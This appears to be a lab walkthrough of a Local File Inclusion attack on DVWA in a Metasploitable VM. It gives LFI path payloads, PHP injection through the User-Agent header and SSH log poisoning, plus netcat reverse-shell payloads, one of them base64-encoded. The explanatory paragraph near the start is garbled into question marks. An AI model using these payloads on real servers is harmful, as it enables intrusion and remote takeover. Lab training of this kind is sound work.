Local File Inclusion(LFI) Vulnerability & Remote Files Access From Server Using LFI

Local File Inclusion(LFI) Vulnerability & Remote Files Access From Server Using LFI

LFI Vulnerability ???

?LFI ?? ???? ????? ???????? ?? ????????? ?? ????? ???????????? ?????????????? ????? ??? ???? ??????? Malicious ???????? Inject ???? ???? ?? ????????? ?????? ???? ???? ??? ??????? ????????? / ????? ????????? ? ?????? ???? ?????

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Payloads to get access using remote code

● /proc/self/environ

● /var/log/auth.log

● /var/log/apache2.accesslog


LFI Vulnerability Live Process: using /etc/passwd & /proc/self/environ payloads

> Open Metasploitable machine > ifconfig > take IP

> In kali browser > put the IP > click DVWA

> DVWA user : admin & password: password

> DVWA > Security low

> go > File Inclusion & Get the link

● Link :

● Try to see the directory:

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LFI vulnerability Check using payload:

We will see in this server LFI vulnerability exist or not, so we will use payload or malicious code to check that.

payload or malicious code: /etc/passwd

● Imposing payload to access the main directory(in browser) :

>> This vulnerability will work on DVWA low and medium security*

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Payloads to get access using remote code




Replace /etc/passwd to /proc/self/environ



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Remote Code Execution (PHP Code)

Now using burpsuite we will execute remove code

> In kali > search with burp > open

> set up proxy in mozilla > mozilla > settings > search with proxy > choose manual proxy & put the IP & Port: 8080

● now go burp > proxy > intercept on & visit the link from mozilla:

> now you capture the request in burp

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> In Burp click INSPECTOR (at right) > request header > user agent > click arrow

> now we will add a remote PHP code to check its getting execute ?

> add this code: <? phpinfo(); ?>

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> apply changes > forward the request

> in browser you will see DVWA is showing its php informations

> so remote code can be executed

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Using Netcat we will take server access now

Netcat or NC is a utility tool that uses TCP and UDP connections to read and write in a network. In the case of attacking. It helps us to debug the network along with investing it. It runs on all operating systems. In Kali its installed in default.

First, we will have to create a listener. We will use the following command to create a listener. POrt can be anything like 8080, 8888.

● in kali : nc -h (to see all cmd)

● nc -l -vv -p 8888


[-l]: Listen Mode

[-vv]: Verbose Mode {It can be used once, but we use twice to be more verbose, it is used to know information about server / machine}

[p]: Local Port

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Add reverse shell to burp

● in burp > again intercept ON > capture request of

● INSPECTOR > user agent > put the reserve shell code : <?passthru("nc -e /bin/sh 8888");?>

(NB: is my kali IP)

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● now in kali > NC get the connection

> pwd (to see direcory)

> ls (see all files)

> cd /var/www/dvwa/

> Now you go to root file and you can hamper any file

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LFI Vulnerability Live Process: using another payload (/var/log/auth.log) and get access using SSH Port

● DVWA : Security : Medium

● Instead of we will use

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create a listener with Netcat:

> First, we will have to create a listener. We will use the following command to create a listener. POrt can be anything like 8080, 8888.

● nc -l -vv -p 8888


In another kali terminal we will execute the SSH Code

> General code : to access through SSH Port :

● ssh -oHostKeyAlgorithms=+ssh-rsa "<?passthru('nc -e /bin/sh 8888');?>"@

NB: like trying to access through SSH, user name: passthru/reverse shell@domain/IP

NB: is my kali IP *

NB: is my Metasploitable machine IP *

● encode nc -e /bin/sh 8888 using burp (open burp > decover > encode as base64 > get encoded code)

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> after encode the SSH code will be

● ssh -oHostKeyAlgorithms=+ssh-rsa "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjM3LjEyOSA4ODg4'));?>"@

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> In mozilla reload

> now see the netcat listening window & you get the connection

> pwd (to see direcory)

> ls (see all files)

> cd /var/www/dvwa/

> Now you go to root file and you can hamper any file

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Minhazul Asif?


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